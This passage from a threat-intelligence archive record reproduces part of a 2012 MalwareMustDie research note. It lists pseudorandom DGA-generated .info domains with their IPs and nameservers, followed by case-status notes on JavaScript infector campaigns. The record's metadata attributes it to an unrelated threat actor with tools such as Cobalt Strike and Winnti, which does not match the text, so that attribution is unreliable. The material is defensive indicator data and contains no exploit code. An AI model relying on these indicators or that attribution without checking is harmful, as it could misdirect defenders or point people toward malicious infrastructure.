NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwrredzpwpicfrch.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nalmmizjrdhepgfop.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwffcrhplrgcwpwtg.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nohclwehzcigwmhce.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\n==================\r\n37.59.236.138\r\n==================\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 12 of 18\n\nhdhgwwqgflwiqwtp.info,37.59.236.138,\r\ncwwppthwwwlejiwg.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\nijwwgrjiolhhzpwc.info,37.59.236.138,\r\nfepzjrdeqwppzpre.info,37.59.236.138,\r\nrwhgwgjmwqffjlip.info,37.59.236.138,\r\nwgeffroawwfhthir.info,37.59.236.138,\r\neffjhejwrjghrcat.info,37.59.236.138,\r\nftctwpcrrchwqdfi.info,37.59.236.138,\r\nwfhfppacfefepwzl.info,37.59.236.138,\r\nwhieggaowrcpiljp.info,37.59.236.138,\r\niwdddhfmozlrpewj.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\nmrtwimcraiprwogw.info,37.59.236.138,\r\ngchecwwgqwwefhgp.info,37.59.236.138,\r\nteihjtzmjjppzccf.info,37.59.236.138,\r\nawpwwoffphrwopef.info,37.59.236.138,\r\nwgwwcgidfwgpprhq.info,37.59.236.138,\r\nwgwwcgidfwgpprhq.info,37.59.236.138,\r\ntfpirqwirfzrfwwg.info,37.59.236.138,\r\nfphfegiwgpojmiai.info,37.59.236.138,\r\nteihjtzmjjppzccf.info,37.59.236.138,\r\nhdhgwwqgflwiqwtp.info,37.59.236.138,\r\ncwwppthwwwlejiwg.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\npjjppdwhrrpjjccq.info,37.59.236.138,\r\nijwwgrjiolhhzpwc.info,37.59.236.138,\r\nfepzjrdeqwppzpre.info,37.59.236.138,\r\nrwhgwgjmwqffjl
ip.info,37.59.236.138,\r\nwgeffroawwfhthir.info,37.59.236.138,\r\neffjhejwrjghrcat.info,37.59.236.138,\r\nftctwpcrrchwqdfi.info,37.59.236.138,\r\nwfhfppacfefepwzl.info,37.59.236.138,\r\nwhieggaowrcpiljp.info,37.59.236.138,\r\niwdddhfmozlrpewj.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\ndcfocihgaoffhteh.info,37.59.236.138,\r\nmrtwimcraiprwogw.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ngchecwwgqwwefhgp.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nawpwwoffphrwopef.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nwgwwcgidfwgpprhq.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nwgwwcgidfwgpprhq.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ntfpirqwirfzrfwwg.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfphfegiwgpojmiai.info,37.59.236.138,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 13 of 18\n\n==================\r\n85.17.58.87\r\n==================\r\ngwgzzpizqamgwfwp.info,85.17.58.87,\r\ntjgarwhghjmwjwla.info,85.17.58.87,\r\ntjgarwhghjmwjwla.info,85.17.58.87,\r\ngwgzzpizqamgwfwp.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ntjgarwhghjmwjwla.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\ntjgarwhghjmwjwla.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfjppppwphhzjhgpr.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nleirgprjowgjewec.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfwrwdeifeicwplwj.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfmrfgffgffgaphwa.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, 
NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nplfwdomfwmrmhawc.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nffctwpfdicpphiej.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfjppppwphhzjhgpr.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nleirgprjowgjewec.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfwrwdeifeicwplwj.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nfmrfgffgffgaphwa.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nltmejelrrhpcorea.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nplfwdomfwmrmhawc.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\nffctwpfdicpphiej.info,85.17.58.87,NS-CANADA.TOPDNS.COM, NS-USA.TOPDNS.COM, NS-UK.TOPDNS.COM\r\n==================\r\n37.59.236.139\r\n==================\r\newdcrwmzwihroclc.info,37.59.236.139,\r\nzgfrldihpwwfiwza.info,37.59.236.139,\r\nwerzjrfmwjohhdre.info,37.59.236.139,\r\nchipeimrjigffwlm.info,37.59.236.139,\r\nchipeimrjigffwlm.info,37.59.236.139,\r\npwdrjifawpewrpwj.info,37.59.236.139,\r\nicfwhhhmdfewcrfz.info,37.59.236.139,\r\ncpprjgplpiheoqwf.info,37.59.236.139,\r\npfheffpgjwchawrd.info,37.59.236.139,\r\niwwdcwwpjiehjliw.info,37.59.236.139,\r\niwwdcwwpjiehjliw.info,37.59.236.139,\r\nfiocgiwhoiwtjwmc.info,37.59.236.139,\r\nrawidpmcfwojiriq.info,37.59.236.139,\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 14 of 
18\n\nwopfrwiereggjjih.info,37.59.236.139,\r\nwrhelwhaaezippem.info,37.59.236.139,\r\nwhwfjhicpthaiwwh.info,37.59.236.139,\r\nopjepgrigfwiehed.info,37.59.236.139,\r\njfwipfgrpcowjpet.info,37.59.236.139,\r\nrwfhtfzzfwdelcer.info,37.59.236.139,\r\njiajrrgfdighiqwj.info,37.59.236.139,\r\njiajrrgfdighiqwj.info,37.59.236.139,\r\ncaepocfephpiecii.info,37.59.236.139,\r\ngofegwzgjrljzgad.info,37.59.236.139,\r\nhfhawjlfwwrzimjg.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npwdrjifawpewrpwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nicfwhhhmdfewcrfz.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncpprjgplpiheoqwf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npfheffpgjwchawrd.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\niwwdcwwpjiehjliw.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nfiocgiwhoiwtjwmc.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrawidpmcfwojiriq.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwopfrwiereggjjih.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwrhelwhaaezippem.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwerzjrfmwjohhdre.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwerzjrfmwjohhdre.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, 
WEST.INAPPLE.COM\r\nwhwfjhicpthaiwwh.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nopjepgrigfwiehed.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njfwipfgrpcowjpet.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwfhtfzzfwdelcer.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncaepocfephpiecii.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ngofegwzgjrljzgad.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhrzzgzqwwwwehhje.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzcfglifwjaihwcww.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\newdcrwmzwihroclc.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzgfrldihpwwfiwza.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nqltzcgfgigcrzgpm.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhfhawjlfwwrzimjg.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhrzzgzqwwwwehhje.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzcfglifwjaihwcww.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, 
SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\newdcrwmzwihroclc.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzgfrldihpwwfiwza.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nqltzcgfgigcrzgpm.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhfhawjlfwwrzimjg.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nchipeimrjigffwlm.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npwdrjifawpewrpwj.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nicfwhhhmdfewcrfz.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncpprjgplpiheoqwf.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\npfheffpgjwchawrd.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\niwwdcwwpjiehjliw.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\niwwdcwwpjiehjliw.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nfiocgiwhoiwtjwmc.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrawidpmcfwojiriq.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, 
WEST.INAPPLE.COM\r\nwopfrwiereggjjih.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwrhelwhaaezippem.info,37.59.236.139,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwhwfjhicpthaiwwh.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nopjepgrigfwiehed.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njfwipfgrpcowjpet.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwfhtfzzfwdelcer.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njiajrrgfdighiqwj.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncaepocfephpiecii.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ngofegwzgjrljzgad.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhrzzgzqwwwwehhje.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzcfglifwjaihwcww.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neeiaeaaaaipgimjf.info,37.59.236.139,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\n-------------------------\r\n # MalwareMustDie\r\n Sat Nov 3 16:43:50 JST 2012\r\n------------------------\r\nDGA Project Monitoring\r\nWe run very basic monitoring in the textual format shown below; the publicly published results are the pastes listed below.\r\nThe goal is to follow the trend of the DGA cases spotted and to understand their activation and infection range:\r\n#MalwareMustDie!! 
| Sun Nov 4 14:52:22 JST 2012\r\n*) This is a compilation of overall Pseudorandom / DGA\r\n Cases of JS/RunforrestRun Infectors Handled by MMD - Overall\r\n---------------------------------------------------------------------------\r\n*) There are three more previous cases left which are currently being sorted now..\r\n We'll do our best; the 4 cases below are compiled...\r\n---------------------------------------------------------------------------\r\n[1] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://malwaremustdie.blogspot.jp/2012/10/fuzzy-in-manual-cracking-of.html (Case Details)\r\nRef2: http://pastebin.com/raw.php?i=tGiTcJ4H (Infector details)\r\nRef3: http://pastebin.com/raw.php?i=vrRq35JF (Current status)\r\nResult: ACTIVATED\r\n---------------------------------------------------------------------------\r\n[2] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://malwaremustdie.blogspot.jp/2012/09/malware-hunting-log-jspseudorandom.html (Case Details)\r\nRef2: http://pastebin.com/raw.php?i=tGiTcJ4H (Infector details1)\r\nRef3: http://pastebin.com/raw.php?i=9zQt23hv (Infector details2)\r\nRef4: http://pastebin.com/raw.php?i=AE3a6xpH (Report)\r\nResult: NOT ACTIVATED\r\n---------------------------------------------------------------------------\r\n[3] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://pastebin.com/raw.php?i=S0cs87P1 (Case details)\r\nRef2: http://pastebin.com/raw.php?i=F05WXQ2Z (Burped Infectors)\r\nRef3: http://pastebin.com/raw.php?i=XXtEbTSZ (Report)\r\nResult: NOT ACTIVATED\r\n---------------------------------------------------------------------------\r\n[4] Update Status of url/domains of DGA / Pseudorandom infectors\r\nRef1: http://pastebin.com/raw.php?i=0VM5ycgq (first type of deobfs burped urls)\r\nRef2: 
http://pastebin.com/raw.php?i=xjwM4gfy (second type of deobfs burped urls)\r\nRef3: http://pastebin.com/raw.php?i=VvQAk9m1 (Report)\r\nResult: ACTIVATED\r\n---------------------------------------------------------------------------\r\n[5] Update Status of url/domains of DGA / Pseudorandom infectors, Case JS/PseudoRandom\r\nRef1: http://malwaremustdie.blogspot.jp/2012/10/decoding-multilayer-javascript-packed.html\r\nRef2: http://pastebin.com/raw.php?i=p6EjiDg7 (Burped Infectors domains)\r\nRef3: Same as case [3] http://pastebin.com/raw.php?i=XXtEbTSZ\r\nStatus: NOT ACTIVATED\r\nCases [6] and [7] were actually repetitions of cases [1] and [2]; no new information is available.\r\nCopyright\r\nAll of the material written here belongs to MalwareMustDie, NPO\r\n Research Group \u003chttp://malwaremustdie.org\u003e.\r\nMention and usage without written permission is strictly\r\nprohibited.\r\nIt is all the hard work of a sleepless team of IT engineers who sacrifice\r\ntheir rest time after long daily work hours to contribute this\r\ndocumentation; please respect it by contacting us upon any\r\nuse for publicity.\r\n#MalwareMustDie!\r\nSource: https://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md"
	],
	"report_names": [
		"DGA_Research_Tips.md"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434127,
	"ts_updated_at": 1775826750,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0f0c4de6c332598a7f3d51403ce07d8b88b19878.pdf",
		"text": "https://archive.orkl.eu/0f0c4de6c332598a7f3d51403ce07d8b88b19878.txt",
		"img": "https://archive.orkl.eu/0f0c4de6c332598a7f3d51403ce07d8b88b19878.jpg"
	}
}